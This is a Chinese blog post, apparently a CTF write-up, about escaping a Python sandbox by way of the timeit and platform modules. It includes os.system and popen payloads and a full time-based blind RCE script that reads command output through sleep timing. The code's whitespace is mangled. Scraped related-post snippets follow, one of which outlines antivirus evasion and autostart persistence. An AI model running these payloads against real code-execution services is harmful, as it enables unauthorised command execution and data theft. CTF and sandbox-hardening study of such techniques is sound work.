python绕过付费_记一次python沙箱逃逸绕过(time based rce)

最新推荐文章于 2023-06-25 06:24:08 发布
最新推荐文章于 2023-06-25 06:24:08 发布
阅读量172 收藏
点赞数
文章标签: python绕过付费

前几天参加了第八届swpu,题目质量很高,学到了很多东西。这里我就一道Python沙箱逃逸题目做一些总结。

题目过滤的很严格,文件读写,网络请求和一些危险模块都被ban掉了。甚至是下划线也会被检测到,这也使得__builtin__,[].__class__.__base__.__subclasses__()魔术方法无法利用。

最后得知利用的是一个内置模块:timeit.我相信很多初学python的人都会用到timeit模块来获取代码的执行时间,参看其文档可以看到这样的用法可以导致任意代码执行。

#coding:utf-8

importtimeit

timeit.timeit("__import__('os').system('')",number=1)

还有一个模块platform同样也行的通。

importplatform

platform.popen('id',mode='r',bufsize=-1).read()

在timeit模块里利用__import__内置函数加载os模块,然后就可以任意命令执行了,但是cat flag是没有回显的,因为返回的是代码的执行时间.再加上这里我把发起网络请求也给ban了,所以并不能通过cloudeye等外带通道获取命令执行的结果。

于是这里就有了一种特殊情况:一个没有回显不能访问外网的命令执行,怎么获取返回的结果呢?答案是:time based rce.

具体可以查看出题人博客http://icematcha.win/?p=532

最后类似盲注脚本如下:

#coding:utf-8#author:icematcha

importrequestsimportsysimportbase64

payloads= "QWERTYUIIOPASDFGHJKLZXCVBNM1234567890="

defrequest(url, data, timeout):try:

res= requests.post(url, data = data, timeout =timeout)returnres.contentexcept:returnTruedefget_length(url, cmd, timeout):

length= ''

for i in xrange(1,10):

value= '''#!/usr/bin/python

#coding:utf-8

import timeit

timeit.timeit("__import__('os').system('if [ $(%s|base32|wc -c|cut -c %s) = ];then sleep 2;fi')", number=1)''' %(cmd, i)

data= {'process': value}

res=request(url, data, timeout)ifres:

llength=ibreak

for i in xrange(1, llength):for _ in xrange(1, 10):

value= '''#!/usr/bin/python

#coding:utf-8

import timeit

timeit.timeit("__import__('os').system('if [ $(%s|base32|wc -c|cut -c %s) = %s ];then sleep 2;fi')", number=1)''' %(cmd, i, _)

data= {'process': value}ifrequest(url, data, timeout):

length+=str(_)printlengthbreak

returnlengthdefget_content(url, cmd, timeout, length):

content= ''

for i in xrange(1, int(length)+1):for payload inpayloads:

value= '''#!/usr/bin/python

#coding:utf-8

import timeit

timeit.timeit("__import__('os').system('if [ $(%s|base32|cut -c %s) = %s ];then sleep 2;fi')", number=1)''' %(cmd, i, payload)

data= {'process': value}ifrequest(url, data, timeout):

content+=payloadprintcontentbreak

returncontentif __name__ == '__main__':

length= get_length('http://47.95.252.234/runcode','cat flag', 2.0)print "## The base32 of content's length is:%s" %length

content= get_content('http://47.95.252.234/runcode', 'cat flag', 2.0, length)print "## The base32 of content is:%s" %contentprint "## The commend result content is:%s" % base64.b32decode(content).strip()

weixin_39956443
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python绕过付费认正_python接口自动化三(登录绕开验证码及发帖)
weixin_29545089的博客
02-04 965
前言有些登录的接口会有验证码:短信验证码,图形验证码等,这种登录的话验证码参数可以从后台获取的(或者查数据库最直接)。获取不到也没关系,可以通过添加cookie的方式绕过验证码。但是这里需要明确一点,验证码本就是为了防止用户自动化的,如果可以的话可以直接让开发给个万能验证码,没必要在验证码这里浪费时间。一、抓登录cookie1.登录后会生成一个已登录状态的cookie,那么只需要直接把这个值添加到...
python绕过付费_python SSTI绕过
weixin_39850365的博客
12-06 375
原理首先以jinja2模板注入为例:{{request[request.args.param]}} 可以用 {{request|attr(request.args.param)}} 替代绕过"["、"]"过滤绕过的方式也就是同义语句转化,下面给出其他的替换绕过"_"字符:?exp={{request|attr([request.args.usc*2,request.args.class,reque...
python绕过付费_Python GUI自动化实现绕过验证码登录
weixin_42314420的博客
02-04 513
这篇文章主要介绍了python GUI自动化实现绕过验证码登录,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下1. 获取cookies实现代码如下: import timefrom selenium import webdriverclass cookies_login:wd=webdriver.Chrome()def getCookies(sel...
python绕过付费_利用请求+python绕过cookies
weixin_39752157的博客
02-04 801
我对Python和刮痧很在行。我了解基本原理,但就是无法克服这个问题。在我想从www.tweakers.net网站在请求和beautifullsoup库中使用python。但是,当我抓取时,我会不断地抓取cookie语句,而不是实际的站点内容。希望有人能帮我做代码。我在其他网站上也遇到过类似的问题,所以我真的很想知道我如何解决这样的问题。这就是我现在所拥有的。在import timefrom bs...
python绕过付费_使用OpCode绕过Python沙箱的方法详解
weixin_39943000的博客
12-06 187
0x01 OpCodeopcode又称为操作码,是将python源代码进行编译之后的结果,python虚拟机无法直接执行human-readable的源代码,因此python编译器第一步先将源代码进行编译,以此得到opcode。例如在执行python程序时一般会先生成一个pyc文件,pyc文件就是编译后的结果,其中含有opcode序列。如何查看一个函数的OpCode?def a():if 1 ==...
使用OpCode绕过Python沙箱的方法详解
09-18
绕过Python沙箱需要对Python的字节码有深入的理解,同时也需要考虑沙箱的具体实现。在实际应用中,沙箱可能会对字节码操作进行额外的限制,因此实际绕过可能需要更复杂的技巧和策略。总的来说,掌握OpCode知识是提高...
python_gym:在健身房沙箱
03-09
Python Gym 是一个强大的环境库,专门用于开发和比较强化学习算法。它为各种经典控制、游戏、棋盘游戏和无尽的任务提供了模拟环境,让研究人员能够轻松地在这些环境中训练和测试他们的AI模型。"在健身房沙箱"指的是...
沙箱逃逸练习题python源码
02-13
里面是近十道python逃逸题目的python源码,在python环境中运行既可以进入题目环境。 可以查看我写的沙箱逃逸的博客结合练习 https://blog.csdn.net/qq_43390703/article/details/104256001
Python库 | node_vm2-0.3.5.tar.gz
03-08
Python的`node_vm2`库就是基于这一思想,为Python开发者提供了一种在Python程序中运行Node.js JavaScript代码的桥梁。 在`node_vm2`中,你可以创建一个`Context`对象,这个对象相当于一个独立的JavaScript运行环境...
python绕过付费认正_python绕过验证码登录_绕过验证
weixin_39949413的博客
12-10 177
12306验证码算什么?这些才是真正的奇葩489x403 - 22KB - JPEGlinux运维有必要学python开发吗?640x346 - 33KB - JPEGPython爬虫开发之反爬虫措施及爬虫编写注意事500x393 - 23KB - JPEG时间序列预测全攻略(附带Python代码)600x250 - 47KB - PNG小白学数据之常用Python库小抄表 - 科技 - 东638...
绕过收费网站不能再收费的软件Login Me
04-23
很多网站都是注册之后才能享受一系列相关服务的,例如YouTube,但是,注册有时候显得很浪费时间,所以这个软件就诞生了。使用这个软件,可以提供给你多达174166个(目前)网站的免费ID,你可以直接使用这些ID来登陆你进入的网站,当然,这个软件只会提供一些免费注册账户,而且,由于是外国软件,所以这174166个网站中估计没有(也许)中国的网站
discuz论坛免金币下载工具
08-28
利用discuz的附件下载提权漏洞实现免金币下载附件,曾经有人发过一个为易语言版本,体积大,并且不能多次下载,下载新资源需要重新打开。这个是本人为使用方便重写,由C#编写体积较小需要.NET支持,本来想挂载皮肤美观界面的,考虑到体积没做,时间问题没做过多的判断,也可能存在BUG还请谅解,在评论里面反馈就好。
详解python 破解网站反爬虫的两种简单方法
12-20
最近在学爬虫时发现许多网站都有自己的反爬虫机制,这让我们没法直接对想要的数据进行爬取,于是了解这种反爬虫机制就会帮助我们找到解决方法。 常见的反爬虫机制有判别身份和IP限制两种,下面我们将一一来进行介绍。 (一) 判别身份 首先我们看一个例子,看看到底什么时反爬虫。 我们还是以 豆瓣电影榜top250(https://movie.douban.com/top250) 为例。` import requests # 豆瓣电影榜top250的网址 url = 'https://movie.douban.com/top250' # 请求与网站的连接 res = requests.get(url)
python沙箱逃逸
夏日 の blog
02-06 1530
说明:本篇文章适合这方面的小白的入门,结合我的另一篇文章https://blog.csdn.net/zss192/article/details/104199520更容易理解 一些常见的寻找特殊模块的方式 __class__:获得当前对象的类 __bases__:列出其基类 __mro__ :列出解析方法的调用顺序,类似于bases __subclasses__():返回子类列表 __dict...
chatgpt赋能pythonPython绕过付费的SEO技巧
最新发布
reilust的博客
06-25 266
本文由chatgpt生成,文章没有在chatgpt生成的基础上进行任何的修改。以上只是chatgpt能力的冰山一角。作为通用的Aigc大模型,只是展现它原本的实力。对于颠覆工作方式的ChatGPT,应该选择拥抱而不是抗拒,未来属于“会用”AI的人。🧡AI职场汇报智能办公文案写作效率提升教程 🧡专注于AI+职场+办公方向。下图是课程的整体大纲下图是AI职场汇报智能办公文案写作效率提升教程中用到的ai工具。
认识JAVA
weixin_44251712的博客
09-07 186
这里写自定义目录标题JAVA从入门到精通的第一天JAVA是什么?编程语言的分类高级语言的分类Java语言的版本JDK的安装JVM JAVA从入门到精通的第一天 第一次发博客,这将录我学习JAVA从无到有的过程,大家一起加油吧! JAVA是什么? Java是一门编程语言。 编程语言的分类 机器语言:计算机能够识别的语言,规定是以二进制编写的语言,如 0101010110… 汇编语言:以一系列的英文单词组成的指令集合,通过指令使计算机执行相应的程序。 高级语言:c/c++、java、php、javaS
python绕过付费_利用python怎么实现绕过反爬虫
weixin_35355560的博客
02-10 3084
利用python怎么实现绕过反爬虫发布时间:2020-11-26 14:59:48来源:亿速云阅读:71作者:Leah利用python怎么实现绕过反爬虫?针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。首先分析要爬的网站,本质是一个信息查询系统,提供了搜索页面。例如我想获取某个case,需要利用这个case的id或者name字段,才能...
python爬虫跳过付费数据_python爬虫实战二——股票数据定向爬虫
weixin_39976413的博客
11-24 553
功能简介目标: 获取上交所和深交所所有股票的名称和交易信息。输出: 保存到文件中。技术路线: requests---bs4--re语言:python3.5说明网站选择原则: 股票信息静态存在于html页面中,非js代码生成,没有Robbts协议限制。选取方法: 打开网页,查看源代码,搜索网页的股票价格数据是否存在于源代码中。如打开新浪股票网址:链接描述,如下图所示:上图中左边为网页的界面,显示了天...
一次python沙箱逃逸绕过(time based rce)
weixin_34072458的博客
11-09 320
前几天参加了第八届swpu,题目质量很高,学到了很多东西。这里我就一道Python沙箱逃逸题目做一些总结。 题目过滤的很严格,文件读写,网络请求和一些危险模块都被ban掉了。甚至是下划线也会被检测到,这也使得__builtin__,[].__class__.__base__.__subclasses__()魔术方法无法利用。 最后得知利用的是一个内置模块:timeit.我相信很多初学pytho...
python自启动 绕过360_一次绕过杀软的过程
06-10
首先,需要注意的是,绕过杀软是一种不道德的行为,同时也是违法的。因此,我们不鼓励或支持这种行为。 其次,关于Python自启动,一般有两种方法: 1. 将Python脚本添加到系统的启动项中。这样,每次开机启动时,系统会自动运行这个脚本。具体步骤如下: - 打开“运行”窗口,输入“shell:startup”,打开启动文件夹。 - 右键点击文件夹中的空白处,选择“新建”->“快捷方式”。 - 在“快捷方式”的目标栏中输入“python.exe 脚本路径”,如“C:\Python27\python.exe D:\test.py”。 - 点击“下一步”,输入一个名称,如“test”,点击“完成”即可。 2. 使用Windows任务计划程序。这样,可以设置脚本在指定的时间自动运行。具体步骤如下: - 打开“控制面板”->“管理工具”->“任务计划程序”。 - 在任务计划程序中,右键点击“任务计划程序库”,选择“创建任务”。 - 在“常规”选项卡中,输入一个名称和描述,选择“不管用户是否登录都要运行”,勾选“使用最高权限运行”。 - 在“触发器”选项卡中,选择“新建”,设置计划的触发条件,如每天、每周等。 - 在“操作”选项卡中,选择“新建”,设置操作为“启动程序”,输入“python.exe 脚本路径”。 - 点击“确定”保存任务。 对于绕过杀软的过程,一般有以下几种方法: 1. 使用FUD(Fully Undetectable)技术,将病毒代码加密或混淆,使其难以被杀软检测到。 2. 使用虚拟机或沙箱环境,在其中运行病毒代码,以避免被杀软检测。 3. 修改病毒代码,使其不再具有病毒行为,从而不被杀软检测到。 4. 手动编写病毒代码,使用未被杀软识别的技术和方法。 需要注意的是,这些方法都存在风险和不道德性质,因此不应该轻易尝试。同时,杀软的主要目的是保护用户安全,因此绕过杀软的行为也可能会对用户造成风险和危害。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值